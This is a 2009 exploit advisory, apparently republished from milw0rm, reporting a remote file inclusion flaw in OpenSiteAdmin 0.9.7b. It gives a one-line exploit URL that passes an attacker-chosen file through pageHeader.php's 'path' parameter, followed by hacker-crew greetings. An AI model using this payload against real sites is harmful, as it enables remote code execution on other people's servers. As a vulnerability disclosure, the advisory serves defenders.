OpenSiteAdmin 0.9.7b - 'pageHeader.php?path' Remote File Inclusion

🗓️ 17 Sep 2009 00:00:00Reported by EA NgelType

OpenSiteAdmin 0.9.7b - 'pageHeader.php?path' Remote File Inclusion vulnerability. Author EA Ngel, Location Republik Rakyat Indonesia, Exploit at http://127.0.0.1/OpenSiteAdmin/pages/pageHeader.php?path=[thanks.txt?], Special Thanks to str0ke, basix, cr4wl3r, and others. Greetz to ManadoCoding and SekuritiOnline crew. GOD BLESS AL

                     [#]OpenSiteAdmin 0.9.7 BETA Remote File Include Vulnerability[#]
                        ----------------------------------------------------------



[@]=====================================================================================================[@]
[+] Author	 	 : EA Ngel
[+] Location    	 : Republik Rakyat Indonesia [RRI]
[+] Situs          	 : www[dot]manadocoding[dot]net
[+] Contact        	 : engelpemula[at]gmail[at]com
[+] Download Script	 : http://sourceforge.net/projects/opensiteadmin/files/
[@]=====================================================================================================[@]



[@]=====================================================================================================[@]
[+] 3rr0r Bu9		 : - pageHeader.php
[@]=====================================================================================================[@]



[@]=====================================================================================================[@]
[+] 3xpl0it		 : http://127.0.0.1/OpenSiteAdmin/pages/pageHeader.php?path=[thanks.txt?]
[@]=====================================================================================================[@]



[@]=====================================================================================================[@]
[+] Sp3ci4l Th4nks  	 : str0ke > basix > cr4wl3r > kamuiclone > Mr.C > kamuiclone > cokiki > cyberlog
[+]                        angky_tatoki > doniskynet > rezagmas > g4pt3k > my_wisdom > hmei7 > k3nz0 
[+]		           wishnu > bl4ck_3n91n3 > Mr.Crossbeam > kiddies > yadiyauri > zpy > moon_lee 
[+]		           c6 > and friends
[@]=====================================================================================================[@]



[@]=====================================================================================================[@]
[+] Greetz t00		 : All crew ManadoCoding and All Crew SekuritiOnline
[@]=====================================================================================================[@]


					* GOD BLESS ALL *

# milw0rm.com [2009-09-17]

17 Sep 2009 00:00Current

7High risk

Vulners AI Score7

OpenSiteAdmin 0.9.7b - &#039;pageHeader.php?path&#039; Remote File Inclusion

OpenSiteAdmin 0.9.7b - 'pageHeader.php?path' Remote File Inclusion